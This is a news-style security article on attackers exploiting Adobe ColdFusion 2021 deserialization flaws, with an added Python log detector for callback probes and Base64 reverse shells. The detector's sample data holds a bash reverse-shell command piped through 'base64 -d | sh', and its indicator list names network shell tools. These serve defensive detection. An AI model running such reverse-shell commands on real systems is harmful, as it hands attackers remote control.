Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware


  • Remote attackers can exploit pre-authentication RCE vulnerabilities in Adobe ColdFusion 2021 to seize control of affected systems.
  • Adobe has released security patches to address these vulnerabilities, but attackers are still exploiting them.
  • The attack campaign involves multiple stages, including probing, reverse shells, and the deployment of malware.
  • Four distinct malware strains have been identified: XMRig Miner, Satan DDoS/Lucifer, RudeMiner, and BillGates/Setag backdoor.
  • Users are advised to apply the patches promptly and to deploy detection and blocking measures against the ongoing attacks.

Numerous users of Adobe ColdFusion on both Windows and macOS platforms are currently at risk. ColdFusion, a popular platform for web application development, recently came under attack when remote attackers discovered and exploited pre-authentication remote code execution (RCE) vulnerabilities. Because such flaws let an attacker take control of an affected server without valid credentials, the issues are rated critical.

These attacks target the WDDX deserialization process in Adobe ColdFusion 2021: the server deserializes attacker-supplied WDDX packets, and a crafted packet leads to code execution. Adobe responded with security updates (APSB23-40, APSB23-41, and APSB23-47), but FortiGuard Labs continued to observe exploitation attempts against servers that had not been patched.

Analysis of the attack patterns showed a consistent procedure. The threat actors first probed targets with out-of-band interaction tools such as "interactsh", which confirms that an injected payload executed by having the target call back to an attacker-controlled host. Callbacks were observed to multiple domains, including mooo-ngcom, redteamtf, and h4ck4funxyz. This probing phase told the attackers which servers were exploitable before they took any further action.

The campaign then moved on to reverse shells. Payloads were Base64-encoded in the request and decoded on the server before execution; the resulting shell connects back to attacker-controlled infrastructure, giving the attackers remote control of the victim system.
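The two traffic patterns described above, out-of-band callback probing and Base64-encoded reverse-shell payloads, can both be spotted in ordinary web-server request logs. The following detector is an added example for this page, not code from FortiGuard Labs, Adobe, or the attackers; the log lines, request paths, IP addresses and callback hostnames in it are constructed, and the list of out-of-band service suffixes is an assumption the analyst would maintain from their own intelligence.

```python
"""Scan request-log lines for out-of-band callback probes and Base64-encoded
reverse-shell commands. Added example; the sample data below is constructed."""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Hostname suffixes treated as out-of-band interaction services.
# Assumption: illustrative entries; a real deployment keeps its own list.
OOB_SUFFIXES = ("oast.fun", "oast.pro", "interact.sh")

# Substrings commonly found in decoded reverse-shell one-liners.
SHELL_INDICATORS = ("/dev/tcp/", "bash -i", "nc -e", "ncat ", "mkfifo",
                    "python -c", "python3 -c", "socket.socket", "subprocess")

# A run of Base64 characters long enough to carry a command, with optional padding.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{24,}={0,2}(?![A-Za-z0-9+/=])")

# Hostnames embedded in paths, query strings or bodies (bare IPs are not matched).
HOST_RE = re.compile(r"[a-z0-9][a-z0-9.-]*\.[a-z]{2,}", re.I)


def is_oob_host(host: str) -> bool:
    """True when host is, or is a subdomain of, a known OOB service domain."""
    h = host.lower()
    return any(h == s or h.endswith("." + s) for s in OOB_SUFFIXES)


def decode_b64_candidates(text: str) -> List[str]:
    """Return every Base64 run in text that decodes to valid UTF-8."""
    out: List[str] = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not really Base64, or truncated
        try:
            out.append(raw.decode("utf-8"))
        except UnicodeDecodeError:
            continue  # binary blob, not a shell command
    return out


def analyze_request(line: str) -> Dict[str, List[str]]:
    """Flag OOB callback hosts (raw or inside decoded blobs) and shell payloads."""
    findings: Dict[str, List[str]] = {"oob_hosts": [], "shell_payloads": []}
    decoded_blobs = decode_b64_candidates(line)
    for text in [line, *decoded_blobs]:
        for host in HOST_RE.findall(text):
            if is_oob_host(host) and host.lower() not in findings["oob_hosts"]:
                findings["oob_hosts"].append(host.lower())
    for decoded in decoded_blobs:
        if any(ind in decoded for ind in SHELL_INDICATORS):
            findings["shell_payloads"].append(decoded)
    return findings


def scan_log(lines: List[str]) -> List[Tuple[int, Dict[str, List[str]]]]:
    """Return (line_number, findings) for every line that raised a finding."""
    alerts = []
    for n, line in enumerate(lines, 1):
        f = analyze_request(line)
        if f["oob_hosts"] or f["shell_payloads"]:
            alerts.append((n, f))
    return alerts


# Constructed sample data: a typical bash reverse shell and a harmless token.
SHELL_CMD = "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"
SHELL_B64 = base64.b64encode(SHELL_CMD.encode()).decode()
BENIGN_B64 = base64.b64encode(b"this is a benign token").decode()

# Constructed log lines (addresses from documentation ranges, hypothetical paths).
SAMPLE_LOG = [
    # 1: ordinary request carrying a benign Base64 token -> no finding
    f'198.51.100.7 - - [20/Jul/2023:10:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 1024 token={BENIGN_B64}',
    # 2: probe whose body points at an out-of-band callback host
    '198.51.100.7 - - [20/Jul/2023:10:00:05 +0000] "POST /cfc/example.cfc HTTP/1.1" 500 0 body=url=http://c3k9x.oast.fun/probe',
    # 3: Base64-encoded reverse shell piped through base64 -d
    f'198.51.100.7 - - [20/Jul/2023:10:00:09 +0000] "POST /cfc/example.cfc HTTP/1.1" 500 0 body=cmd=echo {SHELL_B64} | base64 -d | sh',
]

if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG):
        print(line_no, findings)
```

The Base64 matcher deliberately requires a 24-character run and strict decoding, so session tokens and short identifiers fall through; in practice the decoded text should also be checked for the callback domains your probing intelligence names, which is why hosts are extracted from decoded blobs as well as from the raw line.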

Notably, the analysis also revealed a multi-pronged approach in which several malware variants were deployed. The attacks originated from distinct IP addresses, indicating a broad campaign. Malware payloads were encoded…

Source…